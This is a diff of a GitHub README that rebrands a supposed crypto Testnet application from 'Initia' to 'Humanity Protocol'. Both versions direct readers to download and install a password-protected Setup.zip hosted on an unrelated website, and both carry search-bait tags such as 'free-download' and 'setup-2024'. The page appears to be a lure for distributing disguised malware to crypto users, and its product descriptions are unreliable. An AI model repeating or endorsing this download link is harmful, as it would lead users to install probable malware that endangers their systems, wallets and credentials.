dhsidhs/dhsidhs1/README.md

-# 🚀 Initia - Decentralized Incubation Platform 2024 🚀
+# 🚀 Humanity Protocol 🚀

 # [DOWNLOAD](https://erdogansigorta.com/temp/Setup.zip)
 ## Password - z4iS5VVOeZIe

 ## 📜 Overview

-**Initia** is a decentralized incubation platform on Testnet, providing developers with tools and resources to create and scale innovative blockchain projects in a secure environment.
+**Humanity Protocol** is a Testnet application designed to facilitate decentralized identity and verification services.
+It enables developers to create and test systems focused on secure, decentralized identity management.

 ### 📋 How to Use

-1. **Download Initia** using the provided link.
+1. **Download Humanity Protocol** using the link above.
-2. **Install** Initia on your device.
+2. **Install** the application on your system.
-3. **Develop and incubate blockchain projects** with resources and tools on Testnet.
+3. **Begin developing and testing** identity verification services on the decentralized platform.

 ---

-If Initia supports your goals, please ⭐ this repository!
+If you find Humanity Protocol helpful, please ⭐ this repository!

 ### 🔑 Tags

-- Initia
-- Initia-incubation
-- Initia-decentralized
-- Initia-Testnet
-- Initia-free-download
-- Initia-setup-2024
-- Initia-install
-- Initia-platform
+- Humanity-Protocol
-- Initia-tools
+- Humanity-Protocol-for-Testnet
-- Initia-crypto
+- Humanity-Protocol-identity-verification
-- Initia-for-developers
+- Humanity-Protocol-decentralized
-- Initia-blockchain
+- Humanity-Protocol-free
-- Initia-innovation
+- Humanity-Protocol-setup
-- Initia-project-support
+- Humanity-Protocol-install
-- Initia-scalable
+- Humanity-Protocol-2024